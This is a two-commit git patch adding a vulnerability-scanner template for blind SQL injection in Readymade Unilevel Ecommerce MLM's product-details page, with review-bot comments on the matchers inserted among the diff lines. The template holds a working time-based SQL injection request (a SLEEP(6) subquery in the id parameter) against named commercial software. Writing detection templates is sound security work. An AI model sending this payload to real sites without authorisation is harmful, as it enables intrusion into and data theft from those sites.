From d4e2a2be9f18ae524a54f90c339a6ac66eca9713 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Sat, 3 Aug 2024 04:54:55 +0300
Subject: [PATCH 1/2] add readymade sqli
---
 .../other/readymade-unilevel-sqli.yaml | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/vulnerabilities/other/readymade-unilevel-sqli.yaml
diff --git a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
new file mode 100644
index 00000000000..f4d3e6e5f18
--- /dev/null
+++ b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
@@ -0,0 +1,29 @@
+id: readymade-unilevel-sqli
+
+info:
+ name: Readymade Unilevel Ecommerce MLM - SQL Injection
+ author: securityforeveryone
+ severity: high
+ description: |
+ Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
+ reference:
+ - https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
+ metadata:
+ vendor: i-netsolution
+ product: readymade-unilevel-ecommerce
+ tags: packetstorm,ecommerce,readymade,sqli
+
+http:
+ - raw:
+ - |
+ @timeout 30s
+ GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'contains(body,"user_login_id") && contains(content_type,"text/html")'
+ - 'status_code == 200'
+ condition: and
From de0719782b5df5e0bbde5388b05109475332c3b8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 24 Aug 2024 06:51:06 +0400
Subject: [PATCH 2/2] updated matcher
---
 http/vulnerabilities/other/readymade-unilevel-sqli.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
index f4d3e6e5f18..882d23d4c8c 100644
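Review bot: The verdict in the `matchers` block of PATCH 1/2 rests on a single timing sample, `duration>=6`, so a target that is merely slow to answer while serving the same page would be reported as injectable; the body, content-type and status conditions hold for an unaffected page as well. Nothing in the template records that limitation, and the matcher hunk in PATCH 2/2 keeps the same single measurement. Add a comment above the dsl list such as `# time-based check: slow hosts can satisfy duration>=6, confirm findings manually`, and under `info` add `classification:` with `cwe-id: CWE-89` so triage tooling can group the result. Also confirm the annotation spelling: the documented form is `@timeout: 30s` with a colon, and I am not certain the colon-less `@timeout 30s` line is parsed as an annotation rather than left in the raw request.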
--- a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
+++ b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
@@ -11,7 +11,7 @@ info:
 metadata:
 vendor: i-netsolution
 product: readymade-unilevel-ecommerce
- tags: packetstorm,ecommerce,readymade,sqli
+ tags: ecommerce,readymade,sqli

 http:
 - raw:
@@ -24,6 +24,7 @@ http:
 - type: dsl
 dsl:
 - 'duration>=6'
- - 'contains(body,"user_login_id") && contains(content_type,"text/html")'
 - 'status_code == 200'
+ - 'contains(content_type,"text/html")'
+ - 'contains_all(body, "user_login_id", "Products")'
 condition: and
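Review bot: The two body markers in `contains_all(body, "user_login_id", "Products")` (second hunk) are matched case-sensitively and nothing says which page element they come from, so a theme or wording change on the target would turn this into a silent false negative with no hint of what to re-check. A one-line comment above the dsl list, for example `# body markers presumably taken from the product-details page; re-verify if the page layout changes`, would cover that. The new line also spaces its arguments differently from `contains(content_type,"text/html")` directly above it; pick one form for the block. The matcher list starts outside this hunk.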